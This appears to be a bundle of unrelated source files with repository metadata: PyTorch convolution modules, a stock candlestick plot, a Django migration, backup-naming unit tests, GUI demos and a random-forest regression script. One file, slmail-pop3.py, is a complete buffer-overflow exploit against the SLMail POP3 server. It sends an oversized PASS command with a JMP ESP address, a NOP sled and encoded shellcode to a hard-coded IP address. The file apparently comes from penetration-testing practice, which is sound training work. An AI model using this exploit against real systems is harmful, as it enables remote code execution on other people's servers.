def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
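# --- Illustrative sketch (editor's addition): the depthwise-separable idea
# above, expressed with plain nn.Conv2d instead of timm's create_conv2d
# factory. A depthwise conv is a grouped conv with groups == in_channels; the
# 1x1 pointwise conv then mixes channels:
#
#     import torch
#     from torch import nn
#     dw = nn.Conv2d(32, 32, kernel_size=3, padding=1, groups=32, bias=False)
#     pw = nn.Conv2d(32, 64, kernel_size=1, bias=False)
#     y = pw(dw(torch.randn(1, 32, 56, 56)))   # y.shape == (1, 64, 56, 56)
#     # parameters: 32*3*3 + 32*64 = 2,336 vs. 32*64*3*3 = 18,432 for a full conv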
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
ce08b5951af442d5ac48612351d428e06a55e1e3
|
2ef93f98aef88475441e112223d127b583bc96ec
|
/tesla_ohlc.py
|
91125a3b6ff6b4d4e6ad12ce6a156a620543b75f
|
[] |
no_license
|
bluesealin/Machine-Learning
|
ba6d54ef82879f0cf5f3ef58a7bb9941d15e0e94
|
cc637c8901c384e70b7b1decac66ec4d245075c5
|
refs/heads/master
| 2021-05-03T07:42:55.966116
| 2018-01-17T17:41:05
| 2018-01-17T17:41:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
import pandas as pd
import pandas_datareader.data as web
style.use('ggplot')
# creating the csv file
#start = dt.datetime(2000, 1, 1)
#end = dt.datetime(2016, 12, 31)
#df = web.DataReader('TSLA', 'yahoo', start, end)
#df.to_csv('tsla.csv')
# column 0 (dates) will be the index column
df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
# the 100-day moving average takes the mean of the previous 100 closing prices for each day; min_periods=0 avoids NaN at the start
# df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
# resample to Open/High/Low/Close (OHLC) bars; the resample rule can be any pandas offset alias, e.g. '10Min', '6Min', '10D'
df_ohlc = df['Adj Close'].resample('10D').ohlc()
df_volume = df['Volume'].resample('10D').sum()
# data based on 10 days
#print(df_ohlc.head())
# reset index and convert dates to mdates number so we can get the values
df_ohlc.reset_index(inplace=True)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)
# plotting w/ matplotlib and taking the values w/ pandas
# subplot2grid args: (rows, columns) grid size, then the starting cell
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
# this will display beautiful dates
ax1.xaxis_date()
candlestick_ohlc(ax1, df_ohlc.values, width=2, colorup='g')
# x = df_volume.index.map(mdates.date2num), y = df_volume.values, fill from 0 to y
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
plt.show()
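# --- Illustrative sketch (editor's addition): what resample('10D').ohlc()
# produces, on synthetic data. Note that matplotlib.finance was removed from
# matplotlib itself (2.2+); the separate mplfinance package is its maintained
# successor.
#
#     import numpy as np
#     import pandas as pd
#     idx = pd.date_range('2017-01-01', periods=30, freq='D')
#     s = pd.Series(np.arange(30.0), index=idx)
#     print(s.resample('10D').ohlc())   # columns: open, high, low, close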
|
[
"lucasdraichi@gmail.com"
] |
lucasdraichi@gmail.com
|
94661a6524510a11b67815c32e25b75865809f16
|
ff8f1bb7be35166965ca624681f5a522b60de306
|
/medical/migrations/0011_hivemedicalrecords_user.py
|
d96926b9bc913bd8a627d1877f0c5b6cac1215d9
|
[] |
no_license
|
jonathanw82/thehoneycombAM
|
8f6b2e43d7c429b8dd1c4655e7212d4a5c9f7303
|
5a20efd9dcc6f81d1773c01c218a92732a815903
|
refs/heads/master
| 2023-04-10T06:33:48.462700
| 2021-04-12T11:40:56
| 2021-04-12T11:40:56
| 294,968,786
| 1
| 1
| null | 2021-02-16T14:25:58
| 2020-09-12T15:16:27
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 521
|
py
|
# Generated by Django 3.1.3 on 2021-01-21 16:51
import django.contrib.auth.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('medical', '0010_auto_20210112_1633'),
]
operations = [
migrations.AddField(
model_name='hivemedicalrecords',
name='user',
field=models.CharField(default=1, max_length=50, verbose_name=django.contrib.auth.models.User),
preserve_default=False,
),
]
|
[
"jonwhewaycode@outlook.com"
] |
jonwhewaycode@outlook.com
|
3459276818ce07479d8a250a648e51b33e116764
|
c9ca065c2674ca30c12a90ceab88ac5798646473
|
/weather/weather.py
|
0911597edd9300a64cc9034898c72555e919512b
|
[] |
no_license
|
mshazman/data_munging
|
beaa389ad3de48d52f1f2ef03ed4ba7f04c77698
|
f4f815a896f8f7a6957ebbb22369dd760e95072e
|
refs/heads/master
| 2020-07-23T17:03:01.970331
| 2019-09-10T19:07:20
| 2019-09-10T19:07:20
| 207,640,211
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
"""This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
"""class object takes data in form of dictionary and apply functions on it"""
def __init__(self, weather_data):
self.weather_data = weather_data
def min_spread_day(self):
"""Function Return day on with temp diffrence is minimum"""
min_value = self.compute_min_value(self.weather_data)
min_value_key = self.compute_min_value_key(min_value, self.weather_data)
return min_value, min_value_key
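# --- Illustrative sketch (editor's addition; the `calculation.Computation`
# base class is not shown, so this is a standalone equivalent of what
# min_spread_day describes): given day -> (max_temp, min_temp), pick the day
# with the smallest spread.
#
#     data = {1: (88, 59), 2: (79, 63), 3: (77, 55)}
#     day = min(data, key=lambda d: data[d][0] - data[d][1])
#     # day == 2 (spread 79 - 63 = 16)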
|
[
"="
] |
=
|
dbce7481439b0de5401a7b81de4c4d300404aa6b
|
6388104b646b304a081985216ad2f82f09db2af3
|
/slmail-pop3.py
|
67f374a5ffac594a45f6cfba7a7c22230d03e945
|
[] |
no_license
|
war4uthor/CVE-2003-0264
|
73bd207d3f989434be942982d344285633f6fc48
|
82352386a3e740db37f84ebbaed2632965c4c0a8
|
refs/heads/master
| 2020-04-12T12:41:00.763220
| 2018-12-19T22:50:30
| 2018-12-19T22:50:30
| 162,499,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,955
|
py
|
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
    print("\nSending evil buffer...")
    s.connect(('10.11.25.84', 110))
    data = s.recv(1024)
    s.send('USER username' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print("\nDone!")
except:
    print("Could not connect to POP3!")
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
cb8e8814cc62f4c8391fcb723e8027d1860d330b
|
e8c16328e22b8ccda2e3d2998d2ec1689d79914b
|
/exercise_2017/5th_week/test_1.py
|
0ea44957c76a9923802c513c58e5213bc91b5f64
|
[
"MIT"
] |
permissive
|
Taewan-P/python_study
|
e2e68cc0f1467832dace22e27cc70d217560cf2c
|
f347e370aaa33aba5ab233252bcd759b94615348
|
refs/heads/master
| 2021-05-11T03:44:04.495186
| 2018-01-18T03:02:31
| 2018-01-18T03:02:31
| 117,923,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 548
|
py
|
def gcd1_2(m,n):
    print("gcd1_2")
    def loop(m, n, k):
        print("gcd1_2, loop",m,n,k)
        if not(m==0 or n==0):
            if m%2==0 and n%2==0:
                return loop(m//2,n//2,k*2)  # if an error occurs, check here!! (the part that had the blank, k)
            elif m%2==0 and n%2==1:
                return loop(m//2,n,k)
            elif m%2==1 and n%2==0:
                return loop(m,n//2,k)
            elif m<=n:
                return loop(m,(n-m)//2,k)
            else:
                return loop(n,(m-n)//2,k)
        else:
            if m==0:
                return abs(n*k)
            else: #n==0
                return abs(m*k)
    return loop(m,n,1)
print(gcd1_2(18,48))
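# --- Sanity-check sketch (editor's addition): loop() implements Stein's
# binary GCD, so its result should match math.gcd on nonnegative inputs
# (beware: the debug prints above make this verbose):
#
#     import math, random
#     for _ in range(1000):
#         m, n = random.randrange(200), random.randrange(200)
#         assert gcd1_2(m, n) == math.gcd(m, n)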
|
[
"swimtw@naver.com"
] |
swimtw@naver.com
|
9e1bdaa9a0888f3ccb9eba4f462b36b5688e2936
|
2bf1ffde9ed692e27c34d23b67babd95f8f5644d
|
/tests/test_naming.py
|
6fa54b180e6d20e00b54c2fda549cc654ac5e57b
|
[
"MIT"
] |
permissive
|
pvrk/python_backup
|
9dea3d657e619902aebbdcfc236b4eac9c302609
|
d61af53490c791bac1226062af7744a69b335ce9
|
refs/heads/master
| 2022-03-21T06:25:11.638414
| 2019-12-17T17:50:25
| 2019-12-17T17:50:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,233
|
py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
"""Unit tests for Naming."""
import unittest
from asebackupcli.naming import Naming
class TestNaming(unittest.TestCase):
"""Unit tests for class Naming."""
def test_backup_type_str(self):
"""Test Naming.backup_type_str"""
self.assertEqual(
Naming.backup_type_str(is_full=True),
'full')
self.assertEqual(
Naming.backup_type_str(is_full=False),
'tran')
def test_type_str_is_full(self):
"""Test Naming.type_str_is_full"""
self.assertEqual(
Naming.type_str_is_full('full'),
True)
self.assertEqual(
Naming.type_str_is_full('tran'),
False)
def test_construct_filename(self):
"""Test Naming.construct_filename"""
self.assertEqual(
Naming.construct_filename(dbname="test1db", is_full=True,
start_timestamp="20180601_112429",
stripe_index=2, stripe_count=101),
'test1db_full_20180601_112429_S002-101.cdmp')
self.assertEqual(
Naming.construct_filename(dbname="test1db", is_full=False,
start_timestamp="20180601_112429",
stripe_index=2, stripe_count=101),
'test1db_tran_20180601_112429_S002-101.cdmp')
def test_construct_blobname_prefix(self):
"""Test Naming.construct_blobname_prefix"""
self.assertEqual(
Naming.construct_blobname_prefix(dbname="test1db", is_full=True),
'test1db_full_')
def test_construct_blobname(self):
"""Test Naming.construct_blobname"""
self.assertEqual(
Naming.construct_blobname(
dbname="test1db",
is_full=True,
start_timestamp="20180601_112429",
end_timestamp="20180601_131234",
stripe_index=2,
stripe_count=101),
'test1db_full_20180601_112429--20180601_131234_S002-101.cdmp')
def test_parse_ase_generated_filename(self):
"""Test Naming.parse_ase_generated_filename"""
self.assertEqual(
Naming.parse_ase_generated_filename('AZU_trans_20181205_091930_S01-11.cdmp'),
('AZU', '20181205_091930', 1, 11)
)
self.assertEqual(
Naming.parse_ase_generated_filename('AZU_tran_20181205_091930_S01-11.cdmp'),
None
)
def test_parse_filename(self):
"""Test Naming.parse_filename"""
self.assertEqual(
Naming.parse_filename('test1db_full_20180601_112429_S002-101.cdmp'),
('test1db', True, '20180601_112429', 2, 101))
self.assertEqual(
Naming.parse_filename('test1db_tran_20180601_112429_S02-08.cdmp'),
('test1db', False, '20180601_112429', 2, 8))
self.assertEqual(
Naming.parse_filename('bad_input') is None,
True)
def test_parse_blobname(self):
"""Test Naming.parse_blobname"""
self.assertEqual(
Naming.parse_blobname('test1db_full_20180601_112429--20180601_131234_S002-101.cdmp'),
('test1db', True, '20180601_112429', '20180601_131234', 2, 101)
)
self.assertEqual(
Naming.parse_blobname('test1db_tran_20180601_112429--20180601_131234_S2-008.cdmp'),
('test1db', False, '20180601_112429', '20180601_131234', 2, 8)
)
self.assertEqual(
Naming.parse_filename('bad_input'),
None
)
def test_pipe_names(self):
"""Test Naming.pipe_names"""
self.assertEqual(
Naming.pipe_names(dbname='AZU', is_full=True, stripe_count=3, output_dir='/tmp'),
[
'/tmp/backup_AZU_full_001_003.cdmp_pipe',
'/tmp/backup_AZU_full_002_003.cdmp_pipe',
'/tmp/backup_AZU_full_003_003.cdmp_pipe'
]
)
|
[
"chgeuer@microsoft.com"
] |
chgeuer@microsoft.com
|
523d338761f9c0eeceeea3dc1511eeec56a1d292
|
2cef2c608bde91a8e2deb4f88d62e164fce9a0e3
|
/4 - sprites and animations/Codebeispiele/first_sprite.py
|
493830ae10edf48a32b7a4e9df3906a845dee76f
|
[] |
no_license
|
mimuc/mmp-ss21
|
3be6c67e1951f673e5a28d1c1fd44fe2dfe4cb47
|
e20c5363b0ddf1866b7b7c044da7bb9a8330af20
|
refs/heads/master
| 2023-05-31T07:43:44.275815
| 2021-06-21T11:58:13
| 2021-06-21T11:58:13
| 355,538,628
| 5
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import pygame
from pygame.locals import *
class Box(pygame.sprite.Sprite):
def __init__(self, color, initial_position):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((20,20))
self.image.fill(color)
self.rect = self.image.get_rect()
self.rect.topleft = initial_position
def update(self):
pass
pygame.init()
screen = pygame.display.set_mode((640, 480), 0, 32)
box = Box((255,0,0),(0,0))
while True:
for event in pygame.event.get():
if event.type == QUIT:
exit()
screen.fill((0, 0, 0))
screen.blit(box.image,box.rect)
pygame.display.update()
|
[
"florian.bemmann@ifi.lmu.de"
] |
florian.bemmann@ifi.lmu.de
|
eab2e26261a3cbc0a255243129e8e1698d3489e8
|
7f6e573bfe32c1085311a13c79f7c1e2d7a83f79
|
/00977 - Squares of a Sorted Array/solutions.py
|
dcc18552d2afcdc3ec33bd0f108a38b8b4318d50
|
[] |
no_license
|
ngoyal16/LeetCode
|
0b7366c566996422ca7b89c3b0540e494aab4e9f
|
747b902224bd3ded576a67c926cc1fbb458a97d3
|
refs/heads/master
| 2022-12-10T08:34:19.590452
| 2022-12-07T08:28:05
| 2022-12-07T08:28:05
| 175,677,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
class Solution(object):
def sortedSquares(self, A):
"""
:type A: List[int]
:rtype: List[int]
"""
        return [x * x for x in sorted(A, key=abs)]  # return a list, not a lazy map object, to match :rtype:
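# --- Usage sketch (editor's addition): sorting by absolute value first makes
# the squares come out already in non-decreasing order.
#
#     print(Solution().sortedSquares([-4, -1, 0, 3, 10]))   # [0, 1, 9, 16, 100]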
|
[
"noreply@github.com"
] |
ngoyal16.noreply@github.com
|
ff4ba646859730beeecd4cb569fbc5a89f48be03
|
ce7bb5ba72569d1503a54551ce99bb45addd9d15
|
/components/main window (1).py
|
c3e235727794891b14f8b40a59c1877b74f24f77
|
[] |
no_license
|
vic025/todo
|
4fe620ace4704cacfba270494782a166bfd2aa5a
|
56872e1de1ae12fd2c8c10ac3055737372ae3445
|
refs/heads/master
| 2023-07-01T17:58:23.010349
| 2021-08-06T23:06:37
| 2021-08-06T23:06:37
| 363,345,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
# GUI of main window without functionality
import tkinter as tk
from tkinter.font import Font
from tkinter import *
from tkmacosx import Button, CircleButton
from PIL import Image, ImageTk
root = tk.Tk()
root.title('To-do List')
root.geometry('370x500+600+75')
root.resizable(False, False)
# Title (1)
# Font size and weight for the title
title_label_font = Font(
family="SF Pro Rounded",
size=20,
weight="bold"
)
# Title name
title_label = tk.Label(root, text="To-do List",
font=title_label_font)
title_label.place(x=30, y=25)
# Inputs (1)
# Task name entry
new_task_entry = Entry(root, width=11)
new_task_entry.place(x=35, y=75)
# Time entry
new_task_entry_1 = Entry(root, width=5)
new_task_entry_1.place(x=156, y=75)
# Date entry
new_task_entry_2 = Entry(root, width=7)
new_task_entry_2.place(x=223, y=75)
# List (1)
list_tasks = tk.Listbox(width=29, height=16)
list_tasks.place(x=35, y=125)
# Buttons (1)
# Add task button
add_image = ImageTk.PhotoImage(
Image.open("/Users/vic/PycharmProjects/todo/images/add.png"))
add_task_button = CircleButton(root, image=add_image, bg='#ffffff',
fg='#000000', borderless=1, width=35)
add_task_button.place(x=308, y=71)
# Delete selected task button
delete_selected = Button(root, text="Delete", bg='#ffffff',
fg='#000000', borderless=1,
activebackground=('#C96666', '#C96666'))
delete_selected.place(x=35, y=423)
# Delete all tasks
delete_all = Button(root, text="Delete all", bg='#ffffff',
fg='#000000', borderless=1,
activebackground=('#C96666', '#C96666'))
delete_all.place(x=134, y=423)
# Settings button
settings_image = ImageTk.PhotoImage(
Image.open("/Users/vic/PycharmProjects/todo/images/settings.png"))
settings_button = CircleButton(root, image=settings_image, bg='#ffffff',
fg='#000000', borderless=1, width=35)
settings_button.place(x=308, y=418)
root.mainloop()
|
[
"v1q025@gmail.com"
] |
v1q025@gmail.com
|
bff704cfdcc8f2836f96e353d4860b781fb0d8a3
|
3793afb30d9e4ec39a75b2e5618cd6a2eaed0737
|
/portal system/synapse/synapse/rest/key/v1/server_key_resource.py
|
6df46969c4548ae5037bf6630d13f802cdf3c600
|
[
"Apache-2.0"
] |
permissive
|
rubyspiderman/chatsystem_reactjs
|
16a49a2026b70d0556105b02248362bbbfbfc1f9
|
a20edf38b83fe8c2ee36c2a7f3e1f7263dd134e1
|
refs/heads/master
| 2021-01-01T05:18:08.870728
| 2016-05-13T08:33:59
| 2016-05-13T08:33:59
| 58,717,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,996
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.web.resource import Resource
from synapse.http.server import respond_with_json_bytes
from signedjson.sign import sign_json
from unpaddedbase64 import encode_base64
from canonicaljson import encode_canonical_json
from OpenSSL import crypto
import logging
logger = logging.getLogger(__name__)
class LocalKey(Resource):
"""HTTP resource containing encoding the TLS X.509 certificate and NACL
signature verification keys for this server::
GET /key HTTP/1.1
HTTP/1.1 200 OK
Content-Type: application/json
{
"server_name": "this.server.example.com"
"verify_keys": {
"algorithm:version": # base64 encoded NACL verification key.
},
"tls_certificate": # base64 ASN.1 DER encoded X.509 tls cert.
"signatures": {
"this.server.example.com": {
"algorithm:version": # NACL signature for this server.
}
}
}
"""
def __init__(self, hs):
self.hs = hs
self.version_string = hs.version_string
self.response_body = encode_canonical_json(
self.response_json_object(hs.config)
)
Resource.__init__(self)
@staticmethod
def response_json_object(server_config):
verify_keys = {}
for key in server_config.signing_key:
verify_key_bytes = key.verify_key.encode()
key_id = "%s:%s" % (key.alg, key.version)
verify_keys[key_id] = encode_base64(verify_key_bytes)
x509_certificate_bytes = crypto.dump_certificate(
crypto.FILETYPE_ASN1,
server_config.tls_certificate
)
json_object = {
u"server_name": server_config.server_name,
u"verify_keys": verify_keys,
u"tls_certificate": encode_base64(x509_certificate_bytes)
}
for key in server_config.signing_key:
json_object = sign_json(
json_object,
server_config.server_name,
key,
)
return json_object
def render_GET(self, request):
return respond_with_json_bytes(
request, 200, self.response_body,
version_string=self.version_string
)
def getChild(self, name, request):
if name == '':
return self
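# --- Illustrative sketch (editor's addition): how signedjson signs a JSON
# object like the one built in response_json_object above (API names per the
# signedjson package; treat as a hedged sketch and check the installed version):
#
#     from signedjson.key import generate_signing_key
#     from signedjson.sign import sign_json
#     key = generate_signing_key("v1")
#     signed = sign_json({"server_name": "example.com"}, "example.com", key)
#     # signed["signatures"]["example.com"]["ed25519:v1"] holds the base64 signature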
|
[
"rubyspiderman@hotmail.com"
] |
rubyspiderman@hotmail.com
|
0fdfd0a2fe0d2384fb8bf820f0da8991e1d1fce7
|
0a6f6cf66643975895b099004d45aeef6c454c0f
|
/sshc/modelPredict.py
|
8a20d7116d5d2059355091de88d95c096d89c681
|
[] |
no_license
|
hpqcp/Dryer-Project1
|
1f2a1d8bb22f1ab2af00087e9130a691e6cb052f
|
a0fbad8a45d6d03919cdc9f32d53da9879a7c36b
|
refs/heads/master
| 2020-04-29T02:17:06.052118
| 2020-02-25T06:42:27
| 2020-02-25T06:42:27
| 175,760,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,810
|
py
|
#
#
#
import pandas as pd
#
#
#return: trained model, StandardScaler for X, StandardScaler for y
def randomForest_model(_xTrain: object, _yTrain: object) -> object:
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
    # standardize the training and test data
ss_x = StandardScaler()
x_train = ss_x.fit_transform(_xTrain)
# x_test = ss_x.transform(_xTest)
ss_y = StandardScaler()
y_train = ss_y.fit_transform(_yTrain.reshape(-1, 1))
# y_test = ss_y.transform(_yTest.reshape(-1, 1))
    # build and fit the model
rf_model = RandomForestRegressor(n_jobs=-1)
rf_model.fit(x_train, y_train)
return rf_model,ss_x,ss_y
#
#
#
def randomForest_predict_score(_model: object, _ssx: object, _ssy: object, _xTest: object, _yTest: object, _isPlot: object = False) -> object:
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
import chart.plot as plt
# rfr,ss_x,ss_y = randomForest_model(_xTrain,_yTrain)
xTest1 = _ssx.transform(_xTest)
y_predict = _model.predict(xTest1)
    df_p = pd.DataFrame(_ssy.inverse_transform(y_predict))  # convert the standardized predictions back to the original scale
    # df_t = pd.DataFrame(_ssy.inverse_transform(_yTest))  # convert the standardized values back to the original scale
df_t = pd.DataFrame(_yTest)
df = pd.concat([df_t, df_p], axis=1,ignore_index=True)
if _isPlot:
plt.pairPlot(df)
r2 = r2_score(df.values[:, 0], df.values[:, 1])
mse = mean_squared_error(df.values[:, 0], df.values[:, 1])
mae = mean_absolute_error(df.values[:, 0], df.values[:, 1])
return {'R2':r2,'MSE':mse,'MAE':mae},df
#
def model_load(_path=None):
    from sklearn.externals import joblib
    if _path == None :
        raise Exception('Model load path is empty!')
    try:
        model = joblib.load(_path)
    except:
        raise Exception('Failed to load the model!')
    else:
        return model
#
#
def model_save(_model=None,_path=None):
    from sklearn.externals import joblib
    if _model==None or _path == None :
        raise Exception('Model or save path is empty!')
    try:
        joblib.dump(_model,_path)
    except:
        raise Exception('Failed to save the model!')
    else:
        return
#param : 1.
#return : 1. array of fold scores 2. mean score
def cross_score(_x,_y,_n):
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
    # standardize the training and test data
ss_x = StandardScaler()
x1 = ss_x.fit_transform(_x)
ss_y = StandardScaler()
y1 = ss_y.fit_transform(_y.reshape(-1, 1))
randomForest_model = RandomForestRegressor()
kf = KFold(n_splits=_n, shuffle=True)
score_ndarray = cross_val_score(randomForest_model, x1, y1, cv=kf)
return score_ndarray,score_ndarray.mean()
#
#
#
def feature_selection_sshc(_x,_y):
from sklearn.ensemble import RandomForestRegressor
from sklearn.feature_selection import SelectFromModel
from sklearn.preprocessing import StandardScaler
    # standardize the training and test data
ss_x = StandardScaler()
x1 = ss_x.fit_transform(_x)
ss_y = StandardScaler()
y1 = ss_y.fit_transform(_y.reshape(-1, 1))
clf = RandomForestRegressor()
clf = clf.fit(x1, y1)
    return clf.feature_importances_  # importance score of each feature; larger means more important (here the third and fourth features stand out)
#
#
#
#
def searchCV(_x,_y,_testSize=0.25):
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score,mean_squared_error,mean_absolute_error
import chart.plot as plt
    # randomly sample 25% as the test set, 75% as the training set
# x_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=_testSize, random_state=33)
# randomForest_predict(x_train,y_train,x_test,y_test)
#
#
#
if __name__ == "__main__":
__spec__ = None
import utils.excel2redis as rds
import sshc.timeAlignment as timeAlign
import numpy as np
df = rds.getBatchData('4000-2019-10-08*', 1)
df1 = pd.DataFrame(df.values[:, [3, 1, 6, 10, 11, 12, 13, 14, 17]])
df2 = pd.DataFrame(df1,dtype=np.float)
pointDiffList = [0,80,34,17,52,14,3,21,52]
df3=timeAlign.time_align_transform(df2,pointDiffList)
df_y = df3.values[:,0]
df_x = df3.values[:,1:]
#
# model , StandardScaler_x,StandardScaler_y = randomForest_model(df_x,df_y)
# model_save(model,'c://model1.m')
# model_save(StandardScaler_x, 'c://ssx1.m')
# model_save(StandardScaler_y, 'c://ssy1.m')
from sklearn.externals import joblib
model = joblib.load('c://model1.m')
ssx = joblib.load('c://ssx1.m')
ssy = joblib.load('c://ssy1.m')
scores = randomForest_predict_score(model,ssx,ssy, df_x, df_y, _isPlot=True)
# fi = model.feature_importances_
# feature_selection_sshc(df_x,df_y)
#scores,mean_score = cross_score(df_x,df_y,10)
#searchCV(df_x,df_y,_testSize=0.2)
# import chart.plot as plt
# plt.pairPlot(DataFrame(df_y))
# df_train_x = df3.values[200:1500,1:]
# df_train_y = df3.values[200:1500, 0]
# df_test_x = df3.values[200:399,1:]
# df_test_y = df3.values[200:399, 0]
# randomForest_predict(df_train_x,df_train_y,df_test_x,df_test_y)
# time_align_fit(df1,[0,10,20,30,40,50,60,70,80,90,100])
print()
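# --- Illustrative sketch (editor's addition): the scale-then-cross-validate
# pattern of cross_score() above, self-contained on synthetic data:
#
#     import numpy as np
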